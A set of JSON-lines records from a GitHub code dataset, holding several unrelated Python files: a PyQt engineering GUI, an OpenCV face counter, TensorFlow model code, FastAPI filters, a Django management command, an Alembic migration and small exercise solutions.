else:\n tab_index = -1\n\n # retrieve current selection and update the index of the widget stack\n self.ioWidgetStack.setCurrentIndex(self.getActiveObj()[0])\n\n # apply the tab index if both the old and the new widget on the stack are QTabWidgets\n if (tab_index >= 0) and (isinstance(self.ioWidgetStack.currentWidget(), QtGui.QTabWidget)):\n self.ioWidgetStack.currentWidget().setCurrentIndex(tab_index)\n\n ## retrieve the currently with the structure tree selected (sub-)component\n #\n # @return\n #\tan array describing the selected (sub-)component: [0] - index of selected component, [1] - reference to instance of selected component\n #\n def getActiveObj(self):\n\n # get selection of QTreeWidget\n try:\n # try to match the label of the selected component to the list of available components\n label = self.tree.selectedItems()[0].text(0)\n\n if label == self.cobj.identification:\n activeobj = self.cobj\n return [0, activeobj]\n\n for n in range(len(self.cobj.subcomponentList)):\n if label == self.cobj.subcomponentList[n][1].identification:\n activeobj = self.cobj.subcomponentList[n][1]\n return [n + 1, activeobj]\n\n except IndexError:\n return None\n\n ## export the selected component to a new tab\n #\n # this function is called whenever the user click the buttons \"export component\"\n # it retrieves the currently selected component and copies it into a new tab\n def exportSelected(self):\n\n # make a deep copy of selected component\n obj = copy.copy(self.getActiveObj()[1])\n\n if obj == None:\n QtGui.QMessageBox.information(self, \"Error\",\n \"Could not retrieve the currently selected component.\")\n return\n\n # make another deep copy\n # to retrieve and copy the parameter constraints imposed by the parent\n tmp = copy.copy(obj)\n tmp.__init__(\"tmp\")\n obj.thermoInputParams = tmp.thermoInputParams\n obj.thermoOutputParams = tmp.thermoOutputParams\n obj.aeroInputParams = tmp.aeroInputParams\n obj.aeroOutputParams = tmp.aeroOutputParams\n del tmp\n\n # create a new tab based on the generated copy\n self.parent.mainWidget.addTab(GUIcalcIO(obj, self.parent), obj.identification)\n\n ## build the io widget for a (sub-)component\n #\n # @param elem\n #\tcomponent of type AbstractTurbo\n def getParamIOWidget(self, elem):\n\n # thermodynamical GUI\n thermowidget = QtGui.QWidget()\n hboxThermo = QtGui.QHBoxLayout()\n vboxThermo = QtGui.QVBoxLayout()\n vboxThermo.addLayout(hboxThermo)\n thermowidget.setLayout(vboxThermo)\n scrollThermo = QtGui.QScrollArea()\n scrollThermo.setWidget(thermowidget)\n\n # aerodynamical GUI\n aerowidget = QtGui.QWidget()\n hboxAero = QtGui.QHBoxLayout()\n scrollAero = QtGui.QScrollArea()\n vboxAero = QtGui.QVBoxLayout()\n vboxAero.addLayout(hboxAero)\n aerowidget.setLayout(vboxAero)\n scrollAero.setWidget(aerowidget)\n\n # initialize tables for this component\n iotlist = []\n for i in range(4):\n table = QtGui.QTableWidget(self)\n\n table.setColumnCount(1)\n table.horizontalHeader().setStretchLastSection(True)\n iotlist.append(table)\n # connect the cellChanged action\n self.connect(table, QtCore.SIGNAL(\"cellChanged(int,int)\"), self.tableItemChanged)\n\n self.tableList.append(iotlist)\n\n # populate the widget with the tables\n hboxThermo.addWidget(self.tableList[-1][0])\n hboxThermo.addWidget(self.tableList[-1][1])\n\n hboxAero.addWidget(self.tableList[-1][2])\n hboxAero.addWidget(self.tableList[-1][3])\n\n # add tabs\n widget = QtGui.QTabWidget()\n widget.addTab(thermowidget, \"Thermo\")\n widget.addTab(aerowidget, \"Aero\")\n\n # execute custom modular subfunction connected to the component\n for i in elem.modularSubfunctionList:\n i(widget)\n\n return widget\n\n ## slot for changed table data\n #\n # this function is called whenever data in one of the tables is modified\n # this will reset the thermoDone and aeroDone status indicators\n def tableItemChanged(self, item_):\n thermoDone = False\n aeroDone = False\n\n self.calcAeroButton.setEnabled(0)\n\n ## populate a dictionary with data taken from tables\n #\n # @param table_\n #\teither a single table (QTableWidget) or a list of QTableWidgets to fetch the data from\n # @return\n #\ta dictionary containing key,values-pairs of the data within table_\n def getDictFromTable(self, table_):\n\n # target dictionary\n paramdict = {}\n\n try:\n # loop over all tables\n for i in range(len(table_)):\n\n # loop over all rows\n for n in range(table_[i].rowCount()):\n paramdict[str(table_[i].verticalHeaderItem(n).text())] = \\\n self.getInternalValueType(table_[i].item(n, 0).text())\n except TypeError:\n # loop over all rows\n for n in range(table_.rowCount()):\n paramdict[str(table_.verticalHeaderItem(n).text())] = \\\n self.getInternalValueType(table_.item(n, 0).text())\n\n return paramdict\n\n ## populate a table with data taken from a dictionary\n #\n # @todo Documentation!\n def getTableFromDict(self, dict_, table_):\n for i in range(len(table_)):\n for k in range(table_[i].rowCount()):\n for l, m in dict_.iteritems():\n if str(table_[i].verticalHeaderItem(k).text()) == l:\n table_[i].item(k, 0).setText(m)\n\n def getInternalValueType(self, qstring):\n try:\n if str(qstring) == \"None\":\n return None\n else:\n return float(qstring)\n except ValueError:\n return str(qstring)\n\n ## update all tables to reflect the current values stored within the component instances\n #\n # this will reset all tables for all (sub-)components of the current engine,\n # even the ones not shown (all entries of the widget stack)\n def updateTables(self):\n\n ## create item for vertical header\n def headerItem(caption_, tooltip_):\n item = QtGui.QTableWidgetItem()\n item.setText(str(caption_))\n item.setToolTip(str(tooltip_))\n\n return item\n\n ## create item for value item\n def valueItem(value_, tooltip_):\n if isinstance(value_, list) and len(value_) == 1:\n value_ = value_[0]\n \"WARNING: converted atomic list for \" + tooltip_ + \" to string.\"\n\n item = QtGui.QTableWidgetItem()\n item.setText(str(value_))\n item.setToolTip(str(tooltip_))\n\n return item\n\n ## create item for unit item\n def unitItem(unit_, tooltip_):\n item = QtGui.QTableWidgetItem()\n item.setText(\"[\" + str(unit_) + \"]\")\n item.setToolTip(str(tooltip_))\n item.setFlags(QtCore.Qt.ItemIsSelectable)\n item.setTextAlignment(QtCore.Qt.AlignCenter)\n\n return item\n\n # loop over all tables\n for n in range(len(self.tableList)):\n\n # get object associated to the table\n if n == 0:\n obj = self.cobj\n else:\n obj = self.cobj.subcomponentList[n - 1][1]\n\n # storage for all data to be printed\n dictlist = [obj.getThermoInputDict(),\n obj.getThermoOutputDict(),\n obj.getAeroInputDict(),\n obj.getAeroOutputDict()]\n\n # write data into tables\n for index, table in enumerate(self.tableList[n][:]):\n dict_ = dictlist[index]\n table.setRowCount(len(dict_.keys()))\n table.setColumnCount(2)\n labels = []\n for index, item in enumerate(dict_):\n table.setVerticalHeaderItem(index, headerItem(item, dict_[item][2]))\n table.setItem(index, 0, valueItem(dict_[item][0], dict_[item][2]))\n table.setItem(index, 1, unitItem(dict_[item][1], dict_[item][2]))\n table.setVerticalHeaderLabels(labels)\n table.setHorizontalHeaderLabels([\"Value\", \"Unit\"])\n table.horizontalHeader().setMinimumSectionSize(50)\n table.horizontalHeader().resizeSection(0, 200)\n table.horizontalHeader().setDefaultAlignment(QtCore.Qt.AlignHCenter)\n table.verticalHeader().setResizeMode(QtGui.QHeaderView.Fixed)\n\n ## update the input values for all (sub-)components\n #\n # copy the data entered into the input tables to all (sub-)components\n def writeInputToObject(self):\n\n # copy the data for the parent component\n self.cobj.setVariablesFromDict(self.getDictFromTable(self.tableList[0]))\n\n # copy the data for all sub-components\n for i in range(len(self.cobj.subcomponentList)):\n self.cobj.subcomponentList[i][1].setVariablesFromDict(self.getDictFromTable(self.tableList[i + 1]))\n\n ## launch calculation of thermodynamics\n def calcThermodynamics(self):\n try:\n self.writeInputToObject()\n self.cobj.calcThermo()\n self.updateTables()\n except Exception:\n self.calcErr.showMessage(str(sys.exc_info()[1]))\n except Exception as e:\n # print sys.exc_info()\n logger.error(e)\n else:\n self.calcAeroButton.setEnabled(1)\n self.thermoDone = True\n\n ## launch calculation of aerodynamics\n def calcAerodynamics(self):\n try:\n self.writeInputToObject()\n self.cobj.calcAero()\n self.updateTables()\n except Exception:\n self.calcErr.showMessage(str(sys.exc_info()[1]))\n except Exception as e:\n logger.error(e)\n else:\n self.aeroDone = True\n","repo_name":"RoyLemue/gtdev","sub_path":"gtdev/gui/GUIcalcIO.py","file_name":"GUIcalcIO.py","file_ext":"py","file_size_in_byte":16154,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"68"} +{"seq_id":"29178391358","text":"#imagens/px-people.jpg\r\n#haarcascade_frontalface_default.xml\r\n\r\nimport cv2\r\nimport matplotlib.pyplot as plt\r\n\r\nimagem=cv2.imread(\"px-people.jpg\")\r\nimagem=cv2.cvtColor(imagem,cv2.COLOR_BGR2RGB)\r\n\r\n#Transformando a imagem em escala de cinza\r\n\r\nimagem_cinza=cv2.cvtColor(imagem,cv2.COLOR_RGB2GRAY)\r\n\r\n#Criando o classificador\r\n\r\nclassificador=cv2.CascadeClassifier(\"haarcascade_frontalface_default.xml\")\r\n\r\n#Contando a quantidade de faces na imagem\r\n\r\nfaces=classificador.detectMultiScale(imagem_cinza,1.3,5)\r\n\r\nprint(\"Quantidade de rostos na imagem:\",len(faces))\r\n\r\n#Colocando retangulos nos rostos\r\n\r\nimagem_copy=imagem.copy()\r\n\r\nfor (x,y,w,h) in faces:\r\n\r\n cv2.rectangle(imagem_copy,(x,y),(x+w,y+h),(255,255,0),2)\r\n\r\nplt.imshow(imagem_copy)\r\nplt.show()\r\n\r\n\r\n\r\n\r\n","repo_name":"KelvimImperial/detectando_fotos","sub_path":"reconhecimento De Rostos.py","file_name":"reconhecimento De Rostos.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"12834018681","text":"import sys\nsys.path.append( \"../../util\" )\n\nfrom networkcomponents import *\nfrom db_meta import *\nfrom multiple_pointer_custom import *\n\n# INPUT:\n# start_context: BS X N X D1\n# t_col_enoded: BS X T X D2.\n# Output:\n# 1. Columns of the VU units. BS X N X T\n# 2. Context Mask: Actual # of used contexts. BS\n# 2. Operator raw scores of the VU unit. BS X N X Len( OP )\n# 3. Distinct raw scores of the VU unit. BS X N X 2\ndef generate_multiple_vu( start_context, context_mask, t_col_encoded, t_col_mask, iter_num, scope, regularizer, do_agg_tot = False ):\n with tf.variable_scope( scope, reuse = tf.AUTO_REUSE ):\n start_context = apply_mask( start_context, context_mask, float( 0.0 ) )\n start_context = layer_norm( start_context, context_mask, scope = \"c_ln\" )\n mc1, p1 = get_pointer_N( start_context, t_col_encoded, t_col_mask, regularizer, scope = \"PTR1\", dim_scale = 2 )\n mc1 = apply_mask( mc1, context_mask, float( 0.0 ) )\n mc1 = layer_norm( mc1, context_mask, scope = \"m1_ln\" )\n\n # Get Other Scores.\n agg1 = tf.layers.dense( mc1, len( VEC_AGGREGATORS ), kernel_initializer = variable_initializer, name = \"agg_proj\", kernel_regularizer = regularizer )\n dist1 = tf.layers.dense( mc1, 2, kernel_initializer = variable_initializer, name = \"dist_proj\", kernel_regularizer = regularizer )\n op = tf.layers.dense( mc1, len( VEC_OPERATORS ), kernel_initializer = variable_initializer, name = \"oper_proj\", kernel_regularizer = regularizer )\n aggt = tf.layers.dense( mc1, len( VEC_AGGREGATORS ), kernel_initializer = variable_initializer, name = \"agg_tot_proj\", kernel_regularizer = regularizer )\n\n # Get Col Ptr 2.\n mc2, p2 = get_pointer_N( mc1, t_col_encoded, t_col_mask, regularizer, scope = \"PTR2\", dim_scale = 2 )\n mc2 = apply_mask( mc2, context_mask, float( 0.0 ) )\n mc2 = layer_norm( mc2, context_mask, scope = \"m2_ln\" )\n\n # Get Other scores.\n agg2 = tf.layers.dense( mc2, len( VEC_AGGREGATORS ), kernel_initializer = variable_initializer, name = \"agg_proj\", kernel_regularizer = regularizer )\n dist2 = tf.layers.dense( mc2, 2, kernel_initializer = variable_initializer, name = \"dist_proj\", kernel_regularizer = regularizer )\n \n if do_agg_tot:\n return mc1, mc2, p1, p2, agg1, agg2, dist1, dist2, op, aggt\n\n return mc1, mc2, p1, p2, agg1, agg2, dist1, dist2, op \n \n","repo_name":"kakaoenterprise/RYANSQL","sub_path":"src/valueunit_gen_network.py","file_name":"valueunit_gen_network.py","file_ext":"py","file_size_in_byte":2476,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"68"} +{"seq_id":"73951422616","text":"import operator\nfrom typing import Any, Callable, Optional\n\nfrom core.database.base import Base\nfrom fastapi import HTTPException\nfrom sqlalchemy import func\nfrom sqlalchemy.orm import InstrumentedAttribute\nfrom sqlalchemy.sql import Select\n\n__all__ = ['BaseFilter', 'IntegerFilter', 'CharFilter', 'like', 'ilike', 'contains', 'icontains']\n\n\ndef like(model_field: InstrumentedAttribute, value: Any):\n return model_field.like(value)\n\n\ndef ilike(model_field: InstrumentedAttribute, value: Any):\n return model_field.ilike(value)\n\n\ndef contains(model_field: InstrumentedAttribute, value: Any):\n return model_field.contains(value)\n\n\ndef icontains(model_field: InstrumentedAttribute, value: Any):\n return func.lower(model_field).contains(func.lower(value))\n\n\nLOOKUP_EXPR_MAPPER: dict[str, Callable] = {\n '==': operator.eq,\n '>': operator.gt,\n '>=': operator.ge,\n '<': operator.lt,\n '<=': operator.le,\n 'like': like,\n 'ilike': ilike,\n 'contains': contains,\n 'icontains': icontains,\n}\n\n\nclass BaseFilter:\n def __init__(\n self,\n model_class: Optional[Base] = None,\n field_name: Optional[str] = None,\n lookup_expr: str = '==',\n method_name: Optional[str] = None,\n ):\n self.name = ''\n self.model_class = model_class\n self.field_name = field_name\n self.lookup_expr = LOOKUP_EXPR_MAPPER.get(lookup_expr)\n self.method_name = method_name\n\n def filter(self, db_query: Select, value: str) -> Select:\n value = self.validate_value(value)\n return db_query.where(self.lookup_expr(getattr(self.model_class, self.field_name), value))\n\n def validate_value(self, value: str) -> str:\n return value\n\n\nclass IntegerFilter(BaseFilter):\n def validate_value(self, value: str) -> int:\n return int(value)\n\n\nclass CharFilter(BaseFilter):\n def __init__(\n self,\n model_class: Optional[Base] = None,\n field_name: Optional[str] = None,\n lookup_expr: str = '==',\n method_name: Optional[str] = None,\n min_length: Optional[int] = None,\n max_length: Optional[int] = None,\n ):\n super().__init__(\n model_class=model_class,\n field_name=field_name,\n lookup_expr=lookup_expr,\n method_name=method_name,\n )\n self.min_length = min_length\n self.max_length = max_length\n\n def validate_value(self, value: str) -> str:\n value_length = len(value)\n if self.min_length and value_length < self.min_length:\n raise HTTPException(status_code=400, detail=f'{self.name} value is too short')\n if self.max_length and value_length > self.max_length:\n raise HTTPException(status_code=400, detail=f'{self.name} value is too long')\n return value\n","repo_name":"Fagtoy/bgram","sub_path":"project/core/filters/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":2809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"40680629610","text":"from django.db.models import Exists, OuterRef\n\nfrom utils.management.base import TournamentCommand\n\nfrom ...models import BallotSubmission, SpeakerScoreByAdj\n\n\nclass Command(TournamentCommand):\n\n help = \"Removes all blank ballot submissions, i.e. ones without adjudicator speaker scores attached.\"\n\n def add_arguments(self, parser):\n super(Command, self).add_arguments(parser)\n parser.add_argument(\"--dry-run\", action=\"store_true\", help=\"Show what it would delete, but do not actually delete\")\n\n def handle_tournament(self, tournament, **options):\n qs = BallotSubmission.objects.filter(debate__round__tournament=tournament).exclude(\n Exists(SpeakerScoreByAdj.objects.filter(ballot_submission=OuterRef('pk'))))\n for bsub in qs:\n if not options[\"dry_run\"]:\n self.stdout.write(\"Deleting {:s}\".format(str(bsub)))\n else:\n self.stdout.write(\"Would delete {:s}\".format(str(bsub)))\n if not options[\"dry_run\"]:\n qs.delete()\n","repo_name":"TabbycatDebate/tabbycat","sub_path":"tabbycat/results/management/commands/removeblankballots.py","file_name":"removeblankballots.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","stars":219,"dataset":"github-code","pt":"68"} +{"seq_id":"33553953425","text":"# coding: utf-8\n\nimport numpy as np\nimport pandas as pd\nimport networkx as nx\nimport matplotlib.pyplot as plt\nfrom load_graph import load_graph,dict2graph\nfrom plot_graph import plot_graph\nimport os,argparse,glob,json\n\ndef sample_graphs(num_nodes, num_graphs, graph_dir, seed=111):\n\tif os.path.isdir(graph_dir):\n\t\tgraphs = [load_graph(path)\n\t\t\t\t\tfor path in glob.glob(os.path.join(graph_dir,'*.json'))]\n\telse:\n\t\tos.makedirs(graph_dir)\n\t\tgraphs = []\n\texcluded_graph_dir = os.path.join(graph_dir, 'exclude')\n\tif os.path.isdir(excluded_graph_dir):\n\t\texcluded_graphs = [load_graph(path)\n\t\t\t\t\t\t\t\tfor path in glob.glob(os.path.join(excluded_graph_dir,'*.json'))]\n\telse:\n\t\texcluded_graphs = []\n\tnum_excluded_graphs = len(excluded_graphs)\n\tgraphs += excluded_graphs\n\n\tprev_studied_dir = os.path.join(graph_dir, 'previously_studied')\n\tif os.path.isdir(prev_studied_dir):\n\t\tprev_studied_graphs = {os.path.basename(os.path.splitext(path)[0]):load_graph(path)\n\t\t\t\t\t\t\t\tfor path in glob.glob(os.path.join(prev_studied_dir,'*.json'))}\n\telse:\n\t\tprev_studied_graphs = dict()\n\n\trandom_state = np.random.RandomState(seed)\n\tduplications = []\n\tfor graph_ix in range(num_graphs):\n\t\twhile True:\n\t\t\tordered_nodes,node2parents,g = generate_directed_acyclic_graph(num_nodes,random_state=random_state)\n\t\t\toverlap = False\n\t\t\tfor g_prev in graphs:\n\t\t\t\tif nx.algorithms.isomorphism.is_isomorphic(g,g_prev):\n\t\t\t\t\toverlap = True\n\t\t\t\t\tbreak\n\t\t\tif not overlap:\n\t\t\t\tbreak\n\t\tgraphs.append(g)\n\n\t\tisomorphic_name = None\n\t\tfor name_prev,prev_g in prev_studied_graphs.items():\n\t\t\tif nx.algorithms.isomorphism.is_isomorphic(g,prev_g):\n\t\t\t\tisomorphic_name = name_prev\n\t\t\t\tbreak\n\n\t\tbasename_wo_ext = '{:02d}'.format(len(graphs)-num_excluded_graphs-1)\n\t\tif not isomorphic_name is None:\n\t\t\tduplications.append((basename_wo_ext,isomorphic_name))\n\t\tsave_path_wo_ext = os.path.join(graph_dir,basename_wo_ext)\n\t\twith open(save_path_wo_ext + '.json', 'w') as f:\n\t\t\tjson.dump({'ordered_nodes':ordered_nodes,'node2parents':node2parents}, f)\n\t\tplot_graph(g, save_path_wo_ext + '.png')\n\n\tif duplications:\n\t\tdf = pd.DataFrame(duplications,columns=['sampled_graph','previous_graph'])\n\t\tsave_path = os.path.join(graph_dir, 'duplications.csv')\n\t\tif os.path.isfile(save_path):\n\t\t\tdf.to_csv(save_path, index=False, mode='a',header=False)\n\t\telse:\n\t\t\tdf.to_csv(save_path, index=False)\n\n\ndef generate_directed_acyclic_graph(num_nodes, random_state=None):\n\tif random_state is None:\n\t\trandom_state = np.random.RandomState()\n\twhile True:\n\t\tnode2parents = dict()\n\t\tordered_nodes = []\n\t\tfor node_ix in range(num_nodes):\n\t\t\tparents = [node for node in node2parents.keys() if random_state.rand()>0.5]\n\t\t\tnode_name = 'node_{}'.format(node_ix)\n\t\t\tnode2parents[node_name] = parents\n\t\t\tordered_nodes.append(node_name)\n\t\tg = dict2graph(node2parents)\n\t\tif (not nx.algorithms.isolate.number_of_isolates(g)) and (max(map(len,node2parents.values()))>1): # Reject if any node is isolated (no incoming nor outgoing neighbors).\n\t\t\tbreak\n\treturn ordered_nodes,node2parents,g\n\n\n\nif __name__ == \"__main__\":\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('save_dir', type=str, help='Path to the directory where sampled graphs are saved.')\n\tparser.add_argument('num_graphs', type=int, help='# of graphs to sample.')\n\tparser.add_argument('--num_nodes', type=int, default=5, help='# of nodes in the sampled graphs.')\n\tparser.add_argument('--seed', type=int, default=111, help='Random seed.')\n\targs = parser.parse_args()\n\t\t\n\tsample_graphs(args.num_nodes, args.num_graphs, args.save_dir, seed=args.seed)","repo_name":"tkc-morita/attention-based_analysis_of_animal_relations","sub_path":"simulation/generate_graphs_multiple_parents.py","file_name":"generate_graphs_multiple_parents.py","file_ext":"py","file_size_in_byte":3522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"12793668732","text":"class DashController:\n def __init__(self, sale_model, inventory_model, purchase_model, udaro_model, view):\n self.sale_model = sale_model\n self.inventory_model = inventory_model\n self.purchase_model = purchase_model\n self.udaro_model = udaro_model\n self.view = view\n\n def sales_view(self):\n cols = self.sale_model.get_colnames()\n data = self.sale_model.get_allsales()\n self.view.create_treeview(cols, data)\n self.view.view_flag = 0\n\n\n\n def inventory_view(self):\n cols = self.inventory_model.get_colnames()\n data = self.inventory_model.get_allproducts()\n self.view.create_treeview(cols, data)\n self.view.view_flag = 1\n\n\n def purchase_view(self):\n cols = self.purchase_model.get_colnames()\n data = self.purchase_model.get_allpurchases()\n self.view.create_treeview(cols, data)\n self.view.view_flag = 2\n\n\n def udharo_view(self):\n cols = self.udaro_model.get_colnames()\n data = self.udaro_model.get_alludaro()\n self.view.create_treeview(cols, data)\n self.view.view_flag = 3\n\n\n def perform_update(self, cols, values, table):\n \n if table == 0:\n # which means sales table\n self.sale_model.update_by_date(values)\n self.sales_view()\n elif table == 1:\n # which means inventory table\n self.inventory_model.update_by_name(values)\n self.inventory_view()\n elif table == 2:\n # purchase table\n self.purchase_model.update_by_date(values)\n \n self.purchase_view()\n\n elif table == 3:\n self.udaro_model.update_by_date(values)\n \n self.udharo_view()\n else:\n print(\"error\")\n print(cols, values, table)\n\n\n\n def delete_record(self, record, table):\n if table == 0:\n # which means sales table\n self.sale_model.delete_by_date(record[0])\n self.sales_view()\n elif table == 1:\n # which means inventory table\n self.inventory_model.delete_by_name(record[0])\n self.inventory_view()\n elif table == 2:\n # purchase table\n a = self.purchase_model.delete_by_date(record[0])\n if a:\n self.inventory_model.update_deleted(record[1], float(record[2])*float(record[3]))\n self.purchase_view()\n\n elif table == 3:\n self.udaro_model.delete_by_date(record[0])\n self.udharo_view()\n else:\n print(\"error\")\n","repo_name":"Manjil-Karki/pos","sub_path":"controllers/dash.py","file_name":"dash.py","file_ext":"py","file_size_in_byte":2610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"35488905395","text":"from django.contrib import admin\n\nfrom .models import ManagementCommand\n\n\nclass ManagementCommandAdmin(admin.ModelAdmin):\n list_display = ['command', 'args', 'created_on', 'status', 'output']\n\n def get_form(self, request, obj=None, **kwargs):\n self.exclude = ['created_on', 'status', 'output']\n return super(ManagementCommandAdmin, self).get_form(request, obj, **kwargs)\n\n\nadmin.site.register(ManagementCommand, ManagementCommandAdmin)\n","repo_name":"ShahidTariq/DjangoRunCommands","sub_path":"django_run_command/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"68"} +{"seq_id":"72567359575","text":"import pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport os, re\nfrom copy import deepcopy\nimport numpy as np\nfrom tensorboard.backend.event_processing import event_accumulator\nsns.set()\n\n# #加载日志数据\ndef smooth(datalist, weight:float=0.25, block:int = 500):\n new_datalist = []\n for item in datalist:\n new_datalist.append(deepcopy(weight * np.mean(datalist[max(datalist.index(item)-block, 0): datalist.index(item)]) + item*(1-weight)))\n return new_datalist\n\ndef main(dirpath:str='./runs/'):\n event_dir = dirpath\n df = pd.DataFrame()\n all_dir = os.listdir(event_dir)\n all_dir.sort()\n for file in all_dir:\n temp_df = pd.DataFrame()\n subdir = event_dir+file + '/'\n type = re.search(r'_[a-zA-Z]{2,4}\\d{0,2}', subdir).group(0)[1:]\n ea_name = [item for item in os.listdir(subdir) if re.match(r'events*', item) is not None][0]\n ea=event_accumulator.EventAccumulator(subdir + ea_name).Reload().scalars\n key_dir = ea.Keys()\n temp_df['step'] = [item.step for item in ea.Items(key_dir[0])]\n for key in key_dir[:8]:\n temp_df[key] = [item.value for item in ea.Items(key)]\n temp_df['method'] = type\n temp_df['Number of edge devices'] = ea.Items(key_dir[-1])[0].value\n df = pd.concat([df, temp_df])\n #save file\n df.to_csv('./data/saved.csv')\nmain()","repo_name":"XiaoWangya/protocol_learning_with_MADRL","sub_path":"data_save.py","file_name":"data_save.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"40693466289","text":"import re\nclass Bob(object):\n\tdef __init__(self):\n\t\tpass\n\tdef hey(self,string):\n\n\t\tallUpper = re.compile(r'^[\\[A-Z]\\d\\s]+$')\n\t\tdigitAndPunc = re.compile(r'^[\\d]+$')\n\t\tif string.strip() == \"\":\n\t\t\treturn \"Fine. Be that way!\"\n\n\t\telif digitAndPunc.match(''.join(e for e in string if e.isalnum())):\n\t\t\tif string[-1] == \"?\":\n\t\t\t\treturn \"Sure.\"\n\t\t\telse:\n\t\t\t\treturn \"Whatever.\"\n\n\t\telif allUpper.match(''.join(e for e in string if e.isalnum())) or string.upper() == string:\n\t\t\treturn 'Woah, chill out!'\n\n\t\telif string[-1] == \"?\":\n\t\t\treturn \"Sure.\"\n\n\t\telse:\n\t\t\treturn \"Whatever.\"\n","repo_name":"itsolutionscorp/AutoStyle-Clustering","sub_path":"all_data/exercism_data/python/bob/147eb7777fbf48359b771b8db0ce054f.py","file_name":"147eb7777fbf48359b771b8db0ce054f.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"68"} +{"seq_id":"22594194152","text":"class Solution:\n def letterCasePermutation(self, S):\n \"\"\"\n :type S: str\n :rtype: List[str]\n \"\"\"\n ans = [[]]\n\n for char in S:\n n = len(ans)\n\n if char.isalpha():\n for i in range(n):\n ans.append(ans[i][:])\n ans[i].append(char.lower())\n ans[n+i].append(char.upper())\n else:\n for i in range(n):\n ans[i].append(char)\n\n\n ans2 = []\n for i in range(len(ans)):\n ans2.append(\"\".join(ans[i]))\n\n return ans2\n\n def letterCasePermutation2(self, S):\n\n ans = [\"\"]\n\n for char in S:\n if char.isalpha():\n for i in range(len(ans)):\n ans.append(ans[i]+char.upper())\n ans[i] += char.lower()\n else:\n for i in range(len(ans)):\n ans[i] +=char\n return ans\n\n","repo_name":"yukiii-zhong/Leetcode","sub_path":"Array/src/784. Letter Case Permutation.py","file_name":"784. Letter Case Permutation.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"12656354867","text":"\"\"\"Initial Migration\n\nRevision ID: 687b57a0f5e9\nRevises: 2397abc31fe8\nCreate Date: 2021-08-17 17:21:46.123521\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '687b57a0f5e9'\ndown_revision = '2397abc31fe8'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('pitches',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('title', sa.String(length=255), nullable=False),\n sa.Column('post', sa.Text(), nullable=False),\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.Column('time', sa.DateTime(), nullable=True),\n sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('comments',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('comment', sa.Text(), nullable=False),\n sa.Column('user_id', sa.Integer(), nullable=False),\n sa.Column('pitch_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['pitch_id'], ['pitches.id'], ),\n sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('downvotes',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.Column('pitch_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['pitch_id'], ['pitches.id'], ),\n sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('upvotes',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.Column('pitch_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['pitch_id'], ['pitches.id'], ),\n sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.drop_column('users', 'secure_password')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('users', sa.Column('secure_password', sa.VARCHAR(length=255), autoincrement=False, nullable=True))\n op.drop_table('upvotes')\n op.drop_table('downvotes')\n op.drop_table('comments')\n op.drop_table('pitches')\n # ### end Alembic commands ###\n","repo_name":"OscarMugendi/Pitch-App","sub_path":"migrations/versions/687b57a0f5e9_initial_migration.py","file_name":"687b57a0f5e9_initial_migration.py","file_ext":"py","file_size_in_byte":2337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"11572344178","text":"import uproot4\nimport numpy as np\nimport pandas as pd\nimport concurrent.futures\n\n# TODO: not a method! (still specific script)\n\n\ndef convert_root_file_to_parquet(root_path, tree_name, branches, parq_path):\n\n ccup9_2015_file = r\"D:\\GoogleDrive\\Job\\cern\\Alice\\analysis\\data\\RhoPrime\\2015\\4Prongs2015o_withZDCTimes.root\"\n\n tree_name = \"4Prongs/events\"\n\n executor = concurrent.futures.ThreadPoolExecutor()\n\n branches = [\n \"T_Px\",\n \"T_Py\",\n \"T_Pz\",\n \"T_Q\",\n \"T_NumberOfSigmaTPCPion\",\n \"T_TPCRefit\",\n \"T_TPCNCls\",\n \"T_Phi\",\n \"T_Eta\",\n \"T_HasPointOnITSLayer0\",\n \"T_HasPointOnITSLayer1\",\n \"T_ITSModuleInner\",\n 